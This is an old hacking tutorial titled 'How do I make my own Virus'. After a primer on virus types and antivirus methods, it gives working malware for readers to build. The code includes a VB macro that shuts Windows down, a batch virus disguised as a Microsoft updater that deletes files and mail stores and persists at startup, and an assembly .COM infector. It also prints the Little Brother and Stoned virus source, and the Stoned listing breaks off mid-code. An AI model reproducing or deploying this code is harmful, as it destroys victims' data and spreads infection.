__________________________________________________________________ Virus Working or How do I make my own Virus by Ankit Fadia ankit@bol.net.in __________________________________________________________________ How does a Virus Work or How do I make My Own Virus After I wrote the Journals on Happy99 and Melissa, I got many emails asking me regarding the working of a Virus. How it actually infects the computer and how can I make my own Virus;. Well This Journal is aimed at making it clear as to how a Virus Infects something and how exactly it works. I will also be giving an introduction to making your own Virus. Virus: What exactly is a Virus A virus is basically an executable file which is designed such that first of all it should be able to infect documents, then it has to have the ability to survive by replicating itself and then it should also be able to avoid detection. Usually to avoid detection, a Virus disguises itself as a legitimate program which the user would not normally suspect to be a Virus. Viruses are designed to corrupt or delete data on the hard disk i.e. on the FAT (File Allocation Table)Viruses can be classified into mainly the following categories: Boot Sector Viruses (MBR or Master Boot Record) Boot sector viruses can be created without much difficulty and infect either the Master boot record of the hard disk or the floppy drive.The boot record program responsible for the booting of the operating system is replaced by the Virus. The Virus either copies the Master Boot Program to another part of the Hard Disk or overwrites it.They infect the computer when the computer boots up or the computer accesses the infected floppy disk in the floppy drive. Popular Boot Viruses would be Michelangelo, Stone etc ********************* NewBie Tip: Don't know what a MBR or a Master Boot Record is? Now first of all understand what a boot record is. Basically the boot record is the first sector of a floppy or the Hard Disk which contains a boot record which contains info like disk architecture, sector and cluster size etc. The Boot Record of the Hard Disk also has a program known as Boot Loader which loads the OS upon booting. Now The MBR is the first sector of the Hard Disk which contains the boot record and also additional details like Partiton Table etc.If the MBR is corupted then the OS will not be launched. ******************* File or Program Viruses Some programs are viruses in disguise, when executed they load the virus in the memory alongwith the program and perform the predefined steps and infect the system.They infect program files like files with extensions like .EXE, .COM , .BIN , .DRV and .SYS. Some file viruses just replicate while others destroy the program being used at that time. Such viruses start replicated as soon as they are loaded into the memory. As the file viruses also destroy the program currently being used, after removing the virus or disinfecting the system, the program that got corrupted due to the file virus, too, has to be repaired or reinstalled. Some Popular File Viruses would be Sunday, Cascade Multipartite Viruses Multipartitite viruses are the hybrid variety, they can be best described as a cross between both Boot Viruses and File viruses.They not only infect files but also infect the boot sector. They are more destructive and more difficult to remove. First of all, they infect program files and when the infected program is launched or run, the Multipartite viruses start infecting the boot sector too. Now the interesting thing about these viruses is the fact that they do not stop, once the boot sector is infected.Now after the boot sector is infected, when the system is booted, they load into the memory and start infecting other program files. Some popular examples would be Invader and Flip etc. Stealth Viruses They viruses are stealth in nature and use various methods to hide themselves and to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection and hiding from virus scanners.Some can also redirect the disk head to read another sector instead of the sector in which they reside.Some stealth viruses like the Whale conceal the increase in the length of the infected file and display the original length by reducing the size by the same amount as that of the increase, so as to avoid detection from scanners.For example, the whale virus adds 9216 bytes to an infected file and then the virus substracts the same number of bytes i.e. 9216 from the size given in the directory. They are somwhat difficult to detect. Polymorphic Viruses They are the most difficult viruses to detect. They have the ability to mutate this means that they change the viral code known as the signature each time it spreads or infects.Thus Antiviruses which look for specific virus codes are not able to detect such viruses. Now what exactly is a Viral Signature? Basically the Signature can be defined as the specific fingerprint of a particular virus which is a string of bytes taken from the code of the virus.AntiViral softwares maintain a database of known virus signatures and look for a match each time they scan for viruses.As we see a new virus almost everyday, this database of Virus Signatures has to be kept updated. This is the reason why the AntiVirus vendors provide updates. Macro Viruses Firstly to understand Macro Viruses you need to understand a Macro. All of you may have definitely used Microsoft Excel or Word,well in Office97 there is a feature known as Macros which allow a particular task which is performed by a user quite often to be repeated again and again by just clicking a play button.They are set of automated instructions or tasks which make work more efficient and fast for the users.Now beneath Office97 there is a Visual Basic Engine,thus we can say that the core of Microsoft’s Office suite is a Visual Basic Engine which runs behind the scenes and can be used for advanced Visual Basic coding. So macro virus would be a virus which consists of evil or viral macro VBA (Visual Basic Applications.) code which can create havoc in the computer it is executed.These viruses spread quickly and some have random activation, as in it's code can be included many of VB's event handlers.Macro viruses are not platform specific, i.e. a Macro Virus can infect both Windows systems and also Mac systems.But for a Macto virus to infect a system, the Document with the embedded evil macro has to be opened. Now that I have given you a general introduction to the different types of Viruses, lets move on to their working, how they exactly infect the systems.Firstly, above we discussed that Stealth viruses and Polymorphic viruses are dificult to detect…the question arises why?Let's take the exaple of what most Anti Virus softwares do to detect and catch a Virus. Now most Anti Viruses use a technique knoen as CheckSumming. Firstly understand that an executable file cannot change (like a data file.) unless you upgrade the program.So the checksummer in the Anti Virus software observes all executable files and records their sizes. So while scanning it compares the executable file size with the checksum.So as Steath viruses reduce the the size by he sam amount as was the increase, AntiViruses which use only checksumming methods are not able to detect them. So nowdays antiviruses use a method known as Heuristics.Before I get on to what Heuristic scanning really is… PolyMorphic Viruses have the ability to mutate and can change their known Viral signature and hide from signature based anti viruses which compare the signatures of executable files to the database of Viral signatures known till now and thus cannot detect new viruses.Thus polymorphic Viruses cannot be detected by Signature based anti viruses and Steath Viruses cannot be detected by Checksumming. In comes in the Heuristic Scanner which do not scan for viruses using signature based techniques but uses a smarter way to scan for viruses.It scand the drive for Typical viral codes and behaviour. But such viruses have a downside too, sometimes they give false alarms and declare an uninfected file to be a virus. How does a PolyMorphic Virus Strike? 1. The User copies an infected file to the disk. 2. When the infected file is run, it loads the Virus into the memory or the RAM. 3. The new virus looks for a host and starts infecting other files on the disk. 4. The virus makes copies of itself on the disk. 5. The mutation engines on the new viruses generates a new unique encryptic code which is developed due to a new unique algorithm. Thus it avoids detecting from Checksummers. How does a Boot Virus Strike? 1. The user copies the infected file to the Hard disk or a floppy disk. 2. When the infected file is executed, the virus is loaded into the memory. 3. The virus copies the boot record program to another sector and puts a pointer to it on the boot sector. 4. The virus then makes a copy of itself in the disk boot sector. 5. The next time the computer boots from the disk the Virus loads itself into the RAM or memory and starts infecting other files. How does a Macro Virus strike? 1. The user gets an infected Office Doument by email or by any other medium. 2. The infected document is opened by the user. 3. The evil Macro code looks for the event to occur which is set as the event handler at which the Virus is set off or starts infeting other files. Windows does not include an anti-virus program. However, it includes several features that make it difficult for viruses to infect your computer.(This section also gives valuable info on how a Virus works and can be used to figure out how to write a virus.) It does this by using the following features: Blocking Direct Disk Access To infect the system or in other words, to infect the hard disk, some viruses and malicious programs try to get past the operating system and system ROM BIOS using the INT25h and INT26h ports to write to the hard disk directly. Whenever Windows detects a program trying to write directly to the hard disk, it stops the program from doing so and displays an error message saying: 'Windows has disabled direct disk access to protect your long filenames. To override this protection, see the LOCK /? command for more information. The system has been halted. Press CTRL+ALT+DELETE to restart your computer. This feature prevents such Viruses and malicious programs from directly writing to the hard disk and thus to a certain extend helps to prevent infections. Recognising Master Boot Record (MBR) Modifications The deadlier viruses which infect the boot sector try to modify or write to the Master Boot Record though the INT 13h chain. Now what Windows does is that it maintains a list of programs that are using the INT 13h chain(are hooked up to this chain.). Now each time you boot up Windows, it checks to see which programs are using the INT 13h chain and then compares this list of programs to the list it recorded earlier. If Windows finds new programs which were not using the chain the last time Windows recorded the programs hooked up to this chain, it displays an error message: WARNING: Your computer may have a virus. The Master Boot Record on your computer has been modified. Would you like to see more information?' If you click Yes, then the Performance tab which is found under the System Properties is displayed. This helps you in trouble shooting purposes. Normally when a virus has infected your system, then this Performance Tab shows a report saying that a file named Mbrintl3.sys is causing drives to be accessed in MS-DOS Compatibility mode. ldentifing Unknown Device Drivers Windows always maintains a list of all the real-mode device drivers that can be safely replaced with its own protected-mode drivers. Now say you add a new device driver which uses the INT13h or INT21h chains. Then Windows checks to see if it is in the list of drivers that can be safely replaced. If not then Windows is programmed such that it would be able to access drives using only MS-DOS Compatibility mode and not the normal protected mode. In such a scenario, Windows displays the following error message: 'A new MSDOS resident program named may decrease your system performance. Would you like to see more information about this problem?' NOTE: Here is the name of the new device driver. As a result of this feature Windows is able to detect Viruses that use Device Drivers and not the various chains to propagate themselves. How Do I make my own Virus? Someone once said: "The average Virus writer is above 14 years and below the age of 23 and the virus writers of some evil viruses suffer from social loneliness." Well I do agree with the age thing but not the social thing. Most virus creators do not create viruses with the attend of creating havoc or destroying computers. Just out of interest they create a virus and then send it to their friends, and like most email viruses of today, they will spread like anything and before the virus creator knows it the feds would have started a man hunt to seek him. Macro Viruses Macro viruses are just basically VB code written in the Visual Basic Editor that ships with Office 97 or Office 2K. ************* NewBie Tip: To launch the Visual Basic Editor simply press ALT + F11. ************ So in order to write macro viruses you just need to know VB.I am just touching some VB and this guide will in no way make you a VB geek. I am writing a manual on writing Macro viruses as I believe that Macro Viruses are lame and I personally hate VB and think that assembly viruses are much better and deadlier.If you really want to be good at VB then you should know the entire MSDN library like the back of your hand.Access the ultimate source of VB at http://msdn.microsoft.com Macro viruses can have random or multiple activation events. Lets take an example to make it more clear: Private Sub UserForm_Initialize() CommandButton1.Accelerator = "C" 'Set Accelerator key to ALT + C End Sub Private Sub CommandButton1_Click () Dim intshell intshell = shell (c:\windows\Rundll.exe, user , ExitWindowsExec") End Sub The above snippet of code is supposed to trigger off when the user clicks the command button. So as soon as the user clicks the mouse button the function will be activated and a variable by the name intshell is initialised and the victim's computer will shut down without warning. In the line Private Sub CommandButton1_Click () the CommandButton1 is the object and the _Click is the event. The event can also also be changed to something else like DblClick, Keypress, KeyDown,Exit, Enter etc etc. so that the macro or the virus is triggered off when the user double clicks, presses a key, the key is up again, when a form is exited or when the form is started So if you really want to write a Macro Virus, first you need to learn VB. A good place to start first would be the Online MSDN Library or get yourself a good book.If you already know a bit of the language 'Basic' and have done either Javascript or Java i.e know what you mean by event handlers then I am sure you can learn VBA by just reading the Help and reading the artices at MSDN. I personally do not like VB and think if you are still to start to learn VB then you should better learn some other language and I do not think that learning VB is worth the trouble to just making a Virus. If your sole aim is to make a deadly virus and create havoc then do not even consider making a Macro Virus i.e. learning VB.You should rather look at learning Assembly. There are various reasons behind the fact that Macro viruses are not as deadly as Viruses made in Assembly. You may have heard about evil Java applets which when downloaded can create havoc on your pc and you may certainly have heard about the Melissa virus(Read my tutorial on Melissa for Source Code and more info.), well both of them are slow viruses. By that I mean they give time to a user to react and maybe stop infection and they are not efficient. While on the other hand Assembly Viruses do not give the vivtim time to even realise what is happening and before he even knows it, he is infected!!! MAKING YOUR OWN DEADLY BATCH FILE VIRUS: The Atiman_8 Batch File Virus DISCLAIMER: This Virus was created by Ankit Fadia ankit@bol.net.in and is meant for educational purposes only. This Virus was coded to make people understand the basic concept of the Working of a Virus. Execute this Batch File at your own Risk. Any Damage caused by this file is not Ankit Fadia's fault. If you want any information regarding this Virus, do please feel free to contact me at: ankit@bol.net.in also visit my site at: http://www.crosswinds.net/~hackingtruths The following is a simple but somewhat deadly (but quite lame)Batch File Virus that I created.I have named it, Atiman_8 I have used no advanced Batch or DOS commands in this virus and am sure that almost all you will have no problem understanding the code, If you still have trouble understanding the code, do mail me at ankit@bol.net.in @ECHO OFF CLS IF EXIST c:\winupdt.bat GOTO CODE GOTO SETUP :SETUP @ECHO OFF ECHO Welcome To Microsoft Windows System Updater Setup ECHO. copy %0 c:\winupdt.bat >> NUL ECHO Scanning System.....Please Wait prompt $P$SWindows2000 type %0 >> c:\autoexec.bat type %0 >> c:\windows\dosstart.bat ECHO DONE. ECHO. ECHO Installing Components....Please Wait FOR %%a IN (*.zip) DO del %%a FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL ECHO DONE. ECHO. ECHO You Now Need to Register with Microsoft's Partner: Fortune Galaxy to receive automatic updates. PAUSE ECHO Downloading Components...Please Wait START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" ECHO Setup Will Now restart Your Computer....Please Wait ECHO Your System is not faster by almost 40%. ECHO Thank you for using a Microsoft Partner's product. copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL c:\WINDOWS\RUNDLL user.exe,exitwindowsexec CLS GOTO END :CODE CLS @ECHO OFF prompt $P$SWindows2000 IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC type %0 >> c:\autoexec.bat :ABC type %0 >> c:\windows\dosstart.bat FOR %%a IN (*.zip) DO del %%a FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL GOTO :END CLS :END CLS This was an example of a pretty lame batch file virus. We can similarly create a virus which will edit the registry and create havoc. This is just a thought, I am not responsible for what you do with this. Using Assembly to Create Your own Virus!!!! I recently got many emails asking me how they could create viruses and what all languages they need to know before they can create an excellent dreaded virus. Well the simple answer to all these questions is Learn Assembly. It allows us to make real deadly viruses which do not give the victim time to react and infects his system even before he knows what is happening. The best way to learn Assembly would be to read the "Art Of Assembly." It is an excellent book which assumes that you have quite little programming experience. It is easy to understand and quite impressive. Read the Art of Assembly online and become a ASM wiz at: The Art of Assembly Language Programming http://webster.cs.ucr.edu/Page_asm/ArtofAssembly/ArtofAsm.html Online resource: http://www.programmersheaven.com/zone5/index.htm You should also get a book solely about the X86 architecture, get it online From http://developer.intel.com/design/litcentr/index.htm **************** TIP: Assembly not only allows you to make Viruses but along with it comes an added advantage: The Power to Crack software. Keep reading the my Cracking Series to learn more on as to how you can crack programs. **************** Let's move on to the real stuff. In this section I am assuming that you have at least some experience in Assembly. The following piece of text has been written by me with some help from Drako. The survival of a virus is based in its ability to reproduce. "So how do I make a program reproduce?", you might ask. Simple, by getting it to copy itself to other files.... The functional logic of a virus is as follows: 1- Search for a file to infect 2- Open the file to see if it is infected 3- If infected, search for another file 4- Else, infect the file 5- Return control to the host program. The following is an example of a simple virus: ;**************************************************************** ; START OF THE EXAMPLE: ;**************************************************************** ;Warning, this example is a ; - The virus does not test for prior infection ; - it searches only for the first .COM file in the current ; directory ; ; Careful when executing this file, since the first time it's ; executed it will search for and infect the first file in the ; directory. If we later run the newly infected file, it will find ; the first file in its directory, itself. Thus, it will re-infect ; itself over and over. ;===================CODIGO======================================= ;(The variables in a .COM file are relative to offset 100h). codigo segment 'code' org 100h ;Organize all the code starting ; from offset 100h assume cs:codigo,ds:codigo,es:codigo ;Define the use of the ;segments start proc far ;Start the routine COMIENZO: push cs ;Store CS push cs ;Store CS ; once again. pop ds ;Bring DS out from stack pop es ;Bring ES out from stack call falso_proc ;Call proc. so that its ; address is placed in the stack falso_proc proc near falso_proc endp pop bp ;BP<== Proc. address. sub bp, 107h ;BP<== BP - Previous directory ;This is done to take the variables relative to BP, since the ;infection displaces the variables at exactly the length of the ; file. At the first infection, instruction "SUB BP, 107h" is ; 107h, so that the contents of BP is 0; when I call a variable ; with "BP+VARIABLE" the value of the variable's address is not ; modified. When I load it , for example, from a 100h byte ; infected file, the instruction "SUB BP, 107h" leaves me at ; address 207h which means BP=100h, the size of the original file. ; Had I called the variable without adding BP, I would have been ; short by 100h bytes. ;Find the first .COM file in the directory ----------------------------------------- mov ah, 4eh ;Search for the 1st file lea dx, bp+file_inf ;DS:DX= offset of FILE_INF ;(*.*) so it will search all ;the files, including directory ;names with extensions. mov cx, 0000h ;Entry attributes int 21h ;These attributes mentioned in the commentary are the directory's ; entry attributes. When I set the attributes to 0, I'm telling ; DOS to search normal files. If I include a bit combination which ; provides the Hidden, System or Directory attributes, DOS will ; search for files with those attributes, as well as the normal ; files. If the search range includes the Volume bit, the search ; is limited to that. ;These are the bits which correspond to each attribute: ;Bits: 7 6 5 4 3 2 1 0 ; . . . . . . . 1 Bit 0: Read only ; . . . . . . 1 . Bit 1: Hidden ; . . . . . 1 . . Bit 2: System ; . . . . 1 . . . Bit 3: Volume ; . . . 1 . . . . Bit 4: Directory ; . . 1 . . . . . Bit 5: File ; ;Bits 6 and 7 are not used as they are reserved for "future ; applications". ;Open file ;---------------------------------------------------------------- mov ah, 3dh ;Open the file. mov al, 00000010b ;read/write. mov dx, 009eh ;DX<== DTA(filename) offset int 21h ;put the handle in AX push ax ;and store in stack. ;The attributes I'm setting in AL are not the same as before. ; These are the "open" attributes. We are only interested in the ; first 3 bits, ;bits 2 1 0: ; ; 0 0 0 Read only mode ; 0 0 1 Write only mode ; 0 1 0 Read/Write mode ; ;OK, we now have the file attributes stored in AL. What we now ; need to do is to store in DX the offset of the variable where ; I've stored the ASCIIZ chain with the name of the file to be ; opened. In this case, we don't have a NAME_OF_FILE variable. ; Instead, the name is located in the DTA (Disk Transfer Area). I ; we have it in the DTA...... Why? Simply because when we search ; for a file to infect, all the information we need is returned to ; this memory area. This buffer, if it was not reset, is found in ; the PSP; more precisely, it starts at offset 80h and is 43d bytes ; in size. ; ;The DTA format is as follows: ; ;Offset Bytes Function ; 00h 21d Used by DOS for the 4fh service ; (search for the next file) ; 15h 01d Attributes of the file that's been found ; 16h 02d File time ; 18h 02d File date ; 1Ah 04d File size in bytes ; 1Eh 13d File name in an ASCIIZ chain ; (FILENAME.EXT),0 ; ;Well, all that remains to be doe is to give DX the position in ; memory where I've stored the filename: "MOV DX, E1h" and its's ; done. But careful now, remember that DTA starts at offset 80h, ; which means I have to pass to DX the value "80h+1Eh = 9Eh". That ; would than leave "MOV DX, 9Eh"; the problem is solved. Now you are probably asking yourselves what I mean by "handle". The handle is a number which tells DOS which file we want. DOS gives us a handle for each file we open so we have to be careful to have the correct handle for each file which we read/write. ;Read the first 3 bytes. ----------------------------------------------------- pop bx ;I take the handle from the ;stack to BX push bx ;and I store it again. mov ah, 3fh ;Read file. mov cx, 0003h ;Read 3 bytes. lea dx, bp+buffer ;and store in the buffer. int 21h INFECTAR: ;(infect) ;Move pointer to the start. --------------------------------------------------- mov ax, 4200h ;I move the write pointer ;to the beginning of the program mov cx, 0000h mov dx, 0000h int 21h ;The pointer's displacement, relative to the position of the ; pointer as specified in AL, is placed in CX and DX. ; Pointer displacement modes set in AL: ; AL <== 00 Move pointer to the beginning of the file. ; AL <== 01 leave pointer where it is. ; AL <== 02 Move pointer to end-of-file. ;Write the first byte (jmp) ------------------------------------------------- mov ah, 40h ;write the first byte. mov cx, 1d ;Quantity=1. lea dx, bp+jump ;DX<== JUMP offset int 21h ;(Here we still need the handle, but we don't need to set it again ; because the register which contained the information was not ; modified. ; ;The first byte to be written is a JUMP instruction (the symbol for ; the jump is below). What follows the jump is the address of the ; jump, file-length + 1. (test the "+ 1" thoroughly, since this ; can cause problems; if so, multiply by 18 or subtract 23.) ; Hehehehe. ;Since the entire virus code is copied at the end of the file, the ; jump gives the virus control in an infected file. ;Calculating file length ------------------------------------------------- mov cx, 2 ;Copy 2 bytes. mov si, 009ah ;SI<== DTA offset lea di, bp+longitud ;DI<== File LENGTH offset. rep movsb ;Copy. ;This instruction must have the 'SOURCE' buffer address in DS:SI ; and the address where the string will be copied in ES:DI (in this ; case, I copy the file length of the DTA to the variable ; 'LONGITUD'). sub word ptr [bp+longitud], 3 ;subtract 3 bytes from ;[LONGITUD] ;The JMP is completed -------------------------------------- mov ah, 40h ;Write. mov cx, 2d ;Number of bytes. lea dx, bp+longitud ;DX<== LONGITUD (length) ; offset int 21h ;Move pointer to end ------------------------------------------------------- mov ax, 4202h ;Move the write pointer to the ;end of the program. mov cx, 0000h mov dx, 0000h int 21h add word ptr [bp+longitud],3 ;Restore LONGITUD. ;Copy the virus to the program. --------------------------------------------------- pop bx ;Restore the handle. mov ah, 40h mov cx, 190d ;number of bytes to copy. lea dx, bp+comienzo ;Start copying from.... int 21h ;Close the file after infection ------------------------------------ mov ah, 3eh ;Close file. int 21h ;Here, too, we need in DS:DX the address of the buffer which ; contains the filename string, but in this case DS and DX already ; contain those values from before. NO_INFECTAR: ;==================RETURN CONTROL TO THE HOST===================== ;Copy the buffer which contains the first 3 bytes of the file into ; memory. ------------------ mov cx, 0003h ;Number of bytes (3). mov di, 0100h ;DI<== offset 100h. Beginning of the ;program in memory. lea si, bp+buffer ;SI<== BUFFER offset rep movsb ;Copy. ;What we are doing here is to "fix" the file, since when it was ; infected, the first few bytes are overwritten by the virus. That ; is why we reconstruct the file to its original state, by copying ; the first 3 bytes, which we had stored earlier, into memory. ;Jump to offset 100h -------------------------------------------------------- mov ax, 0100h ;Address needed to execute the host jmp ax ;As we mentioned before, in .COM files the executable code begins ; at offset 100h. The information found between 00h and 100h is ; program data, like the DTA for example. ;The main difference between a .COM file and an .EXE is that a .COM ; cannot occupy more than one memory segment, or 65535 bytes. ; .EXEs can, because DOS can 'tailor' them to fit into a number of ; different segments. Unlike.EXE files. .COM files are faithful ; reproductions of the contents of memory. ;====================DATA AREA=================================== buffer db 7d dup(0) longitud db 2 dup(0) file_inf db '*.COM',0 jump db 'é',0 ;<----jump ascii ;(The character '0' is the end of the ASCIIZ string) start endp ;End of main procedure codigo ends ;end of code segment end comienzo ;END. Go to COMIENZO ;**************************************************************** ; END OF EXAMPLE ;**************************************************************** The following is the source code of some popular viruses which will make life easier for you as a Virus Coder: The Brother Virus: cseg segment assume cs:cseg,ds:cseg,es:nothing .RADIX 16 FILELEN equ end - begin oi21 equ end nameptr equ end+4 ;**************************************************************************** ;* Install the program! ;**************************************************************************** org 100h begin: cld mov sp,300 mov ax,0044h ;move program to empty hole mov es,ax mov di,0100h mov si,di mov cx,FILELEN rep movsb mov ds,cx ;get original int21 vector mov si,0084h mov di,offset oi21 mov dx,offset ni21 lodsw cmp ax,dx ;already installed? je cancel stosw movsw push es ;set vector to new handler pop ds mov ax,2521h int 21h cancel: push cs ;restore segment registers pop ds push cs pop es mov bx,30 ;free memory mov ah,4A int 21 mov es,ds:[002C] ;search filename in environment mov di,0 mov ch,0FFh mov al,01 repnz scasb inc di mov word ptr [nameptr],di mov word ptr [nameptr+2],es mov si,offset EXE_txt ;change extension to .EXE call change_ext push cs pop es mov bx,offset param ;make EXEC param. block mov [bx+4],cs mov [bx+8],cs mov [bx+0C],cs lds dx,dword ptr [nameptr] mov ax,4B00 ;execute .EXE program int 21 mov ah,4Dh ;ask return code int 21 mov ah,4Ch ;exit with same return code int 21 ;**************************************************************************** ;* EXEC parameter block ;**************************************************************************** param dw 0, 80, ?, 5C, ?, 6C, ? ;**************************************************************************** ;* File-extensions ;**************************************************************************** EXE_txt db 'EXE',0 COM_txt db 'COM',0 ;**************************************************************************** ;* Interupt handler 24 ;**************************************************************************** ni24: mov al,03 iret ;**************************************************************************** ;* Interupt handler 21 ;**************************************************************************** ni21: pushf push dx push bx push ax push ds push es cmp ax,4B00h ;execute ? jne exit doit: call infect exit: pop es pop ds pop ax pop bx pop dx popf jmp dword ptr cs:[oi21] ;call to old int-handler ;**************************************************************************** ;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX) ;**************************************************************************** infect: cld mov word ptr cs:[nameptr],dx ;save the ptr to the filename mov word ptr cs:[nameptr+2],ds push cs pop ds call searchpoint mov si,offset EXE_txt ;is extension 'EXE'? mov cx,3 rep cmpsb jnz return mov si,offset COM_txt ;change extension to COM call change_ext mov ax,3300h ;get ctrl-break flag int 21 push dx cwd ;clear the flag inc ax push ax int 21 mov ax,3524h ;get int24 vector int 21 push bx push es push cs ;set int24 vec to new handler pop ds mov dx,offset ni24 mov ah,25h push ax int 21 lds dx,dword ptr [nameptr] ;create the virus (unique name) xor cx,cx mov ah,5Bh int 21 jc return1 xchg bx,ax ;save handle push cs pop ds mov cx,FILELEN ;write the virus mov dx,offset begin mov ah,40h int 21 cmp ax,cx pushf mov ah,3Eh ;close the file int 21 popf jz return1 ;all bytes written? lds dx,dword ptr [nameptr] ;no, delete the virus mov ah,41h int 21 return1: pop ax ;restore int24 vector pop ds pop dx int 21 pop ax ;restore ctrl-break flag pop dx int 21 mov si,offset EXE_txt ;change extension to EXE call change_ext ;execute .EXE program return: ret ;**************************************************************************** ;* change the extension of the filename (CS:SI -> ext) ;**************************************************************************** change_ext: call searchpoint push cs pop ds movsw movsw ret ;**************************************************************************** ;* search begin of extension ;**************************************************************************** searchpoint: les di,dword ptr cs:[nameptr] mov ch,0FFh mov al,0 repnz scasb sub di,4 ret ;********************************************************************** ;* Text and Signature ;**************************************************************************** db 'Little Brother',0 end: cseg ends end begin Boot Record program ;Peter Norton boots segment 'code' public boot assume cs:boots boot proc far ; 30-byte DOS info -- set up for 1-side, 8-sector ; change as needed for any other format head: jmp begin ; EB 2A 90 as per normal db ' Norton ' ; 8-byte system id dw 512 ; sector size in bytes db 1 ; sectors per cluster dw 1 ; reserved clusters db 2 ; number of fats dw 64 ; root directory entries dw 320 ; total sectors db 0FEh ; format id dw 1 ; sectors per fat dw 8 ; sectors per track dw 1 ; sides dw 0 ; special hidden sectors ; mysterious but apparently standard 14-byte filler db 14 dup (0) ; carry on with the boot work begin: mov ax,07C0h ; boot record location push ax pop ds mov bx,message_offset ; put offset to message into si mov cx,message_length ; message length from cx continue: mov ah,14 ; write teletype mov al,[bx] push ds push cx push bx int 10h pop bx pop cx pop ds inc bx loop continue mov ah,0 ; read next keyboard character int 16h mov ah,15 ; get video mode int 10h mov ah,0 ; set video mode (clears screen) int 10h int 19h ; re-boot beg_message: db 0Dh,0Ah ; carriage return, line-feed db 0Dh,0Ah db 0Dh,0Ah db 0Dh,0Ah db ' Start your computer with' db 0Dh,0Ah db ' a DOS system diskette.' db 0Dh,0Ah db 0Dh,0Ah db 0Dh,0Ah db ' This is' db 0Dh,0Ah db ' The Norton Utilities' db 0Dh,0Ah db ' Version 3.0' db 0Dh,0Ah db ' from' db 0Dh,0Ah db ' Peter Norton' db 0Dh,0Ah db ' 2210 Wilshire Blvd' db 0Dh,0Ah db ' Santa Monica, CA 90403' db 0Dh,0Ah db 0Dh,0Ah db ' (213) 826-8092' db 0Dh,0Ah db 0Dh,0Ah db 0Dh,0Ah db 0Dh,0Ah db ' Insert a DOS diskette' db 0Dh,0Ah db ' Press any key to start DOS ... ' end_message: ; I put a copyright notice here; you do if you want to ... tail: message_offset equ beg_message - head message_length equ end_message - beg_message filler_amount equ 512 - (tail - head) - 2 db filler_amount dup (0) ; filler db 055h,0AAh ; boot id boot endp boots ends end The STONED VIRUS: LF EQU 0AH CR EQU 0DH XSEG SEGMENT AT 07C0h ORG 5 NEWSEG LABEL FAR XSEG ENDS CODE SEGMENT ASSUME DS:CODE, SS:CODE, CS:CODE, ES:CODE ORG 0 ;***************************************************************************** ; Execution begins here as a boot record. This means that its location and ; CS:IP will be 0000:7C00. The following two JMP instructions accomplish only ; a change in CS:IP so that CS is 07C0. The following two JMPs, and the ; segment definition of XSEG above are best not tampered with. ;***************************************************************************** JMP FAR PTR NEWSEG ;This is exactly 5 bytes long. Don't change it ;The above line will jump to here, with a CS of 07C0 and an IP of 5 JMP JPBOOT ;Jump here at boot up time ;***************************************************************************** ; The following offsets: ; D_TYPE ; O_13_O ; O_13_S ; J_AD_O ; J_AD_S ; BT_ADD ; will be used to access their corresponding variables throughout the code. ; They will vary in different parts of the code, since the code relocates ; itself and the values in the segment registers will change. The actual ; variables are defined with a leading underscore, and should not be used. As ; the segment registers, and the offsets used to access them, change in the ; code, the offsets will be redefined with "=" operators. At each point, the ; particular segment register override needed to access the variables will be ; given. ; ; In this area, the variables should be accessed with the CS: segment override. ;****************************************************************************** D_TYPE = $ ;The type of disk we are booting from _D_TYPE DB 0 OLD_13 EQU $ O_13_O = $ ;Old INT 13 vector offset _O_13_O DW ? O_13_S = $ ;Old INT 13 vector segment _O_13_S DW ? JMP_ADR EQU $ J_AD_O = $ ;Offset of the jump to relocated code _J_AD_O DW OFFSET HI_JMP J_AD_S = $ ;Segment of the jump to the relocated code _J_AD_S DW ? BT_ADD = $ ;Fixed address 0:7C00. Jump addr to boot sector _BT_ADD DW 7C00h ;Boot address segment DW 0000h ;Boot address offset ;********************************************************** ; The INT 13H vector gets hooked to here ;********************************************************** NEW_13: PUSH DS PUSH AX CMP AH,2 JB REAL13 ;Restore regs & do real INT 13H CMP AH,4 JNB REAL13 ;Restore regs & do real INT 13H ;***************************************************************** ; We only get here for service 2 or 3 - Disk read or write ;***************************************************************** OR DL,DL JNZ REAL13 ;Restore regs & do real INT 13H ;***************************************************************** ; And we only get here if it's happening to drive A: ;***************************************************************** XOR AX,AX MOV DS,AX MOV AL,DS:43FH TEST AL,1 ;Check to see if drive motor is on JNZ REAL13 ;Restore regs & do real INT 13H ;****************************************************************** ; We only get here if the drive motor is on. ;****************************************************************** CALL INFECT ;Try to infect the disk ;****************************************************************** ; Restore regs & do real INT 13H ;****************************************************************** REAL13: POP AX POP DS JMP DWORD PTR CS:OLD_13 ;************************************************************** ;*** See if we can infect the disk *** ;************************************************************** INFECT PROC NEAR PUSH BX PUSH CX PUSH DX PUSH ES PUSH SI PUSH DI MOV SI,4 ;We'll try up to 4 times to read it ;*************************************************************** ; Loop to try reading disk sector ;*************************************************************** RDLOOP: MOV AX,201H ;Read one sector... PUSH CS POP ES MOV BX,200H ;...into a space at the 